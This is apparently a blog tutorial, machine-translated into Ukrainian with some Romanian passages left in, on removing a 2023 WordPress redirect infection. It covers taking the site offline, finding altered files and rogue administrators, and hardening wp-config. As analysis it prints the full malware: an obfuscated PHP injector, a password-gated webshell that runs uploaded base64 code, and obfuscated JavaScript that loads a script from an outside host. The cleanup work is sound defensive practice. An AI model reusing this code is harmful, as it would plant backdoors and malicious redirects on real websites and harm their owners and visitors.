WordPress, безперечно, є найбільш використовуваною платформою CMS (Content Management System) як для блогів, так і для початкових інтернет-магазинів (з модулем WooCommerce), що робить його найбільш вразливим для комп’ютерних атак (зломів). Однією з найбільш використовуваних хакерських операцій є перенаправлення скомпрометованого веб-сайту на інші веб-сторінки. Redirect WordPress Hack 2023 — це відносно нове зловмисне програмне забезпечення, яке перенаправляє весь сайт на веб-сторінки зі спамом або, у свою чергу, може заразити комп’ютери користувачів.

Якщо ваш веб-сайт, розроблений на WordPress, перенаправляється на інший сайт, то, швидше за все, він став жертвою вже відомого злому перенаправлення.

У цьому підручнику ви знайдете необхідну інформацію та корисні поради, за допомогою яких можна девірусувати веб-сайт, заражений перенаправленням WordPress Hack (Virus Redirect). Через коментарі ви можете отримати додаткову інформацію або звернутися за допомогою.

Виявлення вірусів, яке переспрямовує сайти WordPress

Раптове і невиправдане зниження відвідуваності веб-сайту, зменшення кількості замовлень (у випадку інтернет-магазинів) або доходів від реклами є першими ознаками того, що щось не так. виявлення “Redirect WordPress Hack 2023” (Вірусне перенаправлення) також можна зробити “візуальний” коли ви відкриваєте веб-сайт і перенаправляєтеся на іншу веб-сторінку.

Як показує досвід, більшість шкідливих веб-програм сумісні з веб-браузерами: Chrome, Firefox, Edge, Opera. Якщо ви користуєтеся Mac, ці віруси не дуже помітні у браузері Safari. Система безпеки Safari мовчки блокує ці шкідливі сценарії.

Що робити, якщо ваш веб-сайт заражено Redirect WordPress Hack

Я сподіваюся, що першим кроком буде не паніка чи видалення веб-сайту. Навіть інфіковані або вірусні файли не слід спочатку видаляти. Вони містять цінну інформацію, яка може допомогти вам зрозуміти, де є порушення безпеки та що вплинуло на вірус. Спосіб дії.

Закрити веб-сайт для загального доступу.

Як закрити вірусний сайт для відвідувачів? Найпростіше скористатися диспетчером DNS і видалити його IP для “A” (доменне ім’я) або визначте для нього неіснуючу IP-адресу. Таким чином, відвідувачі веб-сайту будуть захищені від злому перенаправлення WordPress, який може привести їх до веб-сторінок із вірусами чи СПАМом.

Якщо ви використовуєте CloudFlare як менеджер DNS, ви входите у свій обліковий запис і видаляєте записи DNS “A” для доменного імені. Таким чином, домен, уражений вірусом, залишиться без IP-адреси, і більше не матиме доступу з Інтернету.

Скопіюйте IP-адресу веб-сайту та виконайте “маршрут” щоб лише ви мали доступ до нього. З комп'ютера.

Як змінити справжню IP-адресу веб-сайту на комп’ютерах Windows?

Метод часто використовується для блокування доступу до певних веб-сайтів шляхом редагування файлу “господарі”.

1. Відкрийте Блокнот або інший текстовий редактор (з правами адміністратора) і відредагуйте файл “hosts“. Він розташований у:

C:\Windows\System32\drivers\etc\hosts

2. У файлі “господарі” додати “маршрут” на реальну IP-адресу вашого сайту. IP-адресу видалено вище з менеджера DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Збережіть файл і перейдіть на сайт у браузері.

Якщо веб-сайт не відкривається, і ви не зробили нічого поганого у файлі “господарі”, швидше за все це кеш DNS.

Щоб очистити кеш DNS в операційній системі Windows, відкрийте командний рядок і введіть команду:

ipconfig /flushdns

Як змінити справжню IP-адресу веб-сайту на комп’ютерах Mac / MacBook?

Для користувачів Mac дещо простіше змінити справжню IP-адресу веб-сайту.

1. Відкрийте утиліту Terminal.

2. Запустіть командний рядок (для запуску потрібен системний пароль):

sudo nano /etc/hosts

3. Як і для комп’ютерів з Windows, додайте справжній IP домену.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Збережіть зміни. Ctrl+X (y).

Після того, як ви це зробили “маршрут”, ви єдина особа, яка може отримати доступ до зараженого веб-сайту за допомогою Redirect WordPress Hack.

Повне резервне копіювання сайту – Файли та база даних

Навіть якщо він заражений “перенаправлення злому WordPress”, рекомендовано зробити загальну резервну копію всього веб-сайту. Файли та база даних. Можливо, ви також можете зберегти локальну копію обох файлів з public / public_html а також база даних.

Ідентифікація файлів, які використовує вірус, і файлів, змінених за допомогою Redirect WordPress Hack 2023

Основні цільові файли WordPress Я index.php (в корені), header.php, index.php і footer.php активної теми WordPress. Вручну перевірте ці файли та визначте зловмисний код або сценарій шкідливого ПЗ.

У 2023 році вірус типу “Перенаправлення злому WordPress” вкласти index.php код форми:

(Я не рекомендую запускати ці коди!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Розшифровано, це сценарій шкідливого ПЗ в основному це наслідок зараження веб-сайту WordPress. Це не сценарій, що стоїть за зловмисним програмним забезпеченням, це сценарій, який дозволяє переспрямовувати заражену веб-сторінку. Якщо ми декодуємо сценарій вище, ми отримаємо:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Щоб ідентифікувати всі файли на сервері, які містять цей код, добре мати доступ SSH на сервер для запуску перевірки файлів і командних рядків керування в Linux.

Пов'язаний: Як ви знайдете, чи є у вас блог вірусу чи ні, за допомогою пошуку Google. (Вірус WordPress)

Нижче наведено дві команди, які, безумовно, допоможуть визначити нещодавно змінені файли та файли, які містять певний код (рядок).

Cum vezi pe Linux fișierele PHP modificate în ultimile 24 de ore sau într-un alt interval de timp?

Командування “find” este foarte simplă de utilizat și permite personalizare pentru a seta perioada de timp, path-ul în care se face căutarea și tipul fișierelor.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

În output o să primești informații despre data și ora la care a fost modificat fișierul, permisunile de scriere / citire / executie (chmod) și cărui grup / user aparține.

Dacă vrei să verifici cu mai multe zile în urmă, schimbă valoarea “-mtime -1” sau folosește “-mmin -360” pentru minute (6 ore).

Cum cauți un cod (string) în interiorul fișierelor PHP, Java?

Linia de comandă “знаходити” який можна використовувати для швидкого пошуку всіх файлів PHP або Java, які містять певний код, виглядає наступним чином:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Команда шукатиме та відображатиме файли .php і .js які містять “uJjBRODYsU“.

За допомогою двох наведених вище команд ви дуже легко дізнаєтеся, які файли були нещодавно змінені, а які містять шкідливий код.

Видаляє шкідливий код зі змінених файлів без шкоди для правильного коду. У моєму сценарії зловмисне програмне забезпечення було розміщено перед відкриттям <head>.

При виконанні першої команди “знаходити” Цілком можливо, що ви також знайдете нові файли на сервері, які не належать WordPress і не ви розмістили туди. Файли, що належать вірусу Redirect WordPress Hack.

У сценарії, який я досліджував, шейп-файли з’явилися на сервері “wp-log-nOXdgD.php“. Це файли “покоління” які також містять шкідливий код, який використовується вірусом перенаправлення.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Призначення файлів типу “wp-log-*” полягає в поширенні вірусу злому перенаправлення на інші веб-сайти, розміщені на сервері. Це тип шкідливого коду “webshell” складається з a основний розділ (у якому визначено деякі зашифровані змінні) і o розділ виконання за допомогою якого зловмисник намагається завантажити та виконати шкідливий код у системі.

Якщо є змінна POST названий ‘bh‘ і його зашифроване значення MD5 дорівнює “8f1f964a4b4d8d1ac3f0386693d28d03“, тоді з’являється сценарій для запису зашифрованого вмісту base64 іншої названої змінної ‘b3‘ într-un fișier temporar și apoi încearcă să includă acest fișier temporar.

În cazul în care există o variabilă POST або GET названий ‘tick‘, scriptul va răspunde cu valoarea MD5 a șirului “885“.

Ca să identifici toate fișierele de pe server care conțin acest cod, alege un string care este comun, apoi execută comanda de “find” (similară celei de mai sus). Șterge toate fișierele care conțin acest cod malware.

Вразливість системи безпеки, яка використовується шляхом злому Redirect WordPress

Cel mai probabil acest virus de redirect ajunge prin exploatarea user-ului de administrare WordPress sau prin identificarea unui plugin vulnerabil care permite adăugarea de utilizatori cu privilegii de administrator.

Pentru cele mai multe website-uri construite pe platforma WordPress este posibilă editarea fișierelor temelor sau pluginз інтерфейсу адміністрування (Dashboard). Таким чином, зловмисник може додати зловмисний код до файлів теми, щоб створити сценарії, показані вище.

Приклад такого шкідливого коду:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript визначені в заголовку теми WordPress одразу після відкриття тегу <head>.

Розшифрувати цей JavaScript досить складно, але очевидно, що він запитує іншу веб-адресу, звідки, швидше за все, отримує інші сценарії для створення файлів “wp-log-*” про які ми говорили вище.

Знайдіть і видаліть цей код з усіх файлів PHP постраждали.

Наскільки я міг судити, цей код був додано вручну новим користувачем з правами адміністратора.

Отже, щоб запобігти додаванню шкідливого програмного коду з інформаційної панелі, найкраще вимкнути опцію редагування тем / плагінів WordPress на інформаційній панелі.

Відредагуйте файл wp-config.php і додайте рядки:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Після внесення цієї зміни жоден користувач WordPress не зможе редагувати файли з інформаційної панелі.

Перевірте користувачів із роллю адміністратора

Нижче наведено SQL-запит, який можна використовувати для пошуку адміністраторів на платформі WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Цей запит поверне всіх користувачів у таблиці wp_users хто призначив роль адміністратора. Запит також виконується для таблиці wp_usermeta для пошуку мета ‘wp_capabilities', який містить інформацію про ролі користувачів.

Інший спосіб полягає в тому, щоб ідентифікувати їх за: Dashboard → Users → All Users → Administrator. Однак існують способи, за допомогою яких користувача можна приховати на панелі приладів. Отже, найкращий спосіб побачити користувачів “Адміністратор” з WordPress — це команда SQL вище.

У моєму випадку я ідентифікував користувача за ім’ям у базі даних “wp-import-user“. Досить натякає.

Також тут ви можете побачити дату та час створення користувача WordPress. Ідентифікатор користувача також дуже важливий, оскільки він шукає журнали сервера. Таким чином ви можете бачити всю активність цього користувача.

Видалити користувачів із роллю адміністратора чого ти не знаєш, тоді змінити паролі для всіх адміністративних користувачів. Редактор, автор, адміністратор.

Змініть пароль користувача бази даних SQL ураженого веб-сайту.

Після виконання цих кроків веб-сайт можна перезапустити для всіх користувачів.

Однак майте на увазі, що те, що я представив вище, є одним із, можливо, тисяч сценаріїв, коли веб-сайт заражається Redirect WordPress Hack у 2023 році.

Якщо ваш веб-сайт був заражений і вам потрібна допомога або у вас виникли запитання, розділ коментарів відкритий.